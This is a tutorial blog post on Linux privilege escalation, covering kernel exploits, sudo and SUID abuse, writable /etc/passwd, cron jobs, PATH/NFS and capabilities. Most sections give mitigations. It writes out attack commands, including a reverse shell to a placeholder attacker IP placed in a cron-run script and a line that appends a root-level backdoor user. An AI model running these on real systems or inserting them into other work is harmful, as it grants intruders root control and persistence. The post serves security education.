Sign in Subscribe

Linux Privilege Escalation: Understanding & Exploiting Weaknesses

Linux Privilege Escalation: Understanding & Exploiting Weaknesses
Photo by Gabriel Heinzer / Unsplash

Privilege escalation is a fundamental step in penetration testing and ethical hacking. Once an attacker gains a foothold on a Linux system, their next goal is often to escalate privileges to obtain root access. This allows unrestricted control over the system, data exfiltration, and further lateral movement within the network. In this post, I'll cover the most common and effective Linux privilege escalation techniques, from exploiting misconfigurations to leveraging kernel vulnerabilities.

Why Linux Privilege Escalation Matters

Even if an attacker gains access to a Linux system, they often start with a low-privileged user account. Privilege escalation is crucial for:

  • Bypassing security restrictions to access sensitive data
  • Gaining persistence by creating backdoors
  • Executing administrative commands
  • Compromising the entire system

Now, let's dive into the different methods attackers use to escalate privileges on Linux.

1. Kernel Exploits

Linux kernel vulnerabilities can allow attackers to gain root access if the system is running an outdated or unpatched version. By checking the kernel version, an attacker can identify potential exploits.

Finding Kernel Version:

uname -r
cat /proc/version

Common Kernel Exploits:

  • Dirty COW (CVE-2016-5195): A race condition in the kernel’s memory subsystem allows privilege escalation.
  • OverlayFS (CVE-2021-3493): Exploiting incorrect permission handling.
  • PwnKit (CVE-2021-4034): A vulnerability in Polkit’s pkexec tool.

Keeping the kernel updated and restricting access to exploit code helps mitigate these risks.

2. Misconfigured Sudo Permissions

If a user has sudo privileges without requiring a password or with unrestricted access to specific commands, privilege escalation may be possible.

Checking Sudo Permissions:

sudo -l

Exploiting Misconfigured Sudo:

  • Running commands as root:
sudo su
  • Exploiting unintended binaries:
sudo vi

(Then using :shell or :!bash to escape into a root shell.)

To prevent abuse, administrators should enforce the principle of least privilege (PoLP) and audit the sudoers file (/etc/sudoers).

3. Exploiting SUID Binaries

SUID (Set User ID) binaries execute with elevated privileges. If misconfigured, they can be exploited to gain root access.

Finding SUID Binaries:

find / -perm -4000 2>/dev/null

Exploiting Vulnerable SUID Binaries:

Some common binaries that can be abused include:

/usr/bin/env
/usr/bin/find
/usr/bin/nmap

For example, running:

./nmap --interactive
nmap> !sh

Can provide a root shell if nmap has the SUID bit set.

To mitigate this, administrators should remove unnecessary SUID bits and regularly audit binary permissions.

4. Writable /etc/passwd File

If /etc/passwd is world-writable, attackers can escalate privileges by adding a new root user.

Checking File Permissions:

ls -l /etc/passwd

If writable (-rw-rw-rw-), an attacker can append a new user with UID 0 (root privileges):

echo 'hacker:$6$salt$password:0:0:hacker:/root:/bin/bash' >> /etc/passwd

Then switch to the new root account:

su hacker

To mitigate this, permissions on /etc/passwd should be strictly controlled (-rw-r--r--).

5. Exploiting Cron Jobs

Scheduled tasks (cron jobs) running as root can be exploited if they execute writable scripts or commands.

Finding Root Cron Jobs:

cat /etc/crontab
ls -la /etc/cron.*

If a root-owned cron job executes a script in a user-writable directory, an attacker can modify the script to run a reverse shell or escalate privileges.

Example attack:

echo "bash -i >& /dev/tcp/attacker-ip/4444 0>&1" > /tmp/malicious.sh
chmod +x /tmp/malicious.sh

Once the cron job executes /tmp/malicious.sh, a root shell will be opened.

To mitigate this, administrators should restrict cron job permissions and avoid executing scripts from writable locations.

6. Path Manipulation & NFS Exploits

Attackers can exploit PATH environment variables if a misconfigured binary executes commands without specifying their full path.

Similarly, misconfigured NFS shares can be leveraged to gain root access on a mounted system. Attackers can check for exploitable NFS mounts using:

showmount -e <target-IP>

To secure against these attacks, administrators should ensure absolute paths are used in scripts and that root squashing is enabled in NFS configurations.

7. Capabilities & Advanced Exploitation

Beyond SUID binaries, Linux provides capabilities that allow fine-grained control over privileged actions. Attackers can check for misconfigured capabilities with:

getcap -r / 2>/dev/null

Exploitable capabilities, such as cap_setuid or cap_net_raw, can often lead to privilege escalation.

8. Tools for Privilege Escalation

  • LinPEAS – Automates the search for privilege escalation paths.
  • Linux Exploit Suggester – Suggests potential kernel exploits.
  • GTFOBins – A database of Unix binaries useful for privilege escalation.

Final Thoughts

Privilege escalation in Linux is a game of patience and methodical analysis. Whether through kernel exploits, misconfigurations, or abusing permissions, attackers have numerous ways to escalate privileges. For penetration testers, mastering these techniques is crucial. For defenders, regularly patching vulnerabilities, auditing permissions, and enforcing least privilege are the best defenses.

The more you experiment and analyze real-world scenarios, the better you’ll understand how to break—and secure—Linux systems.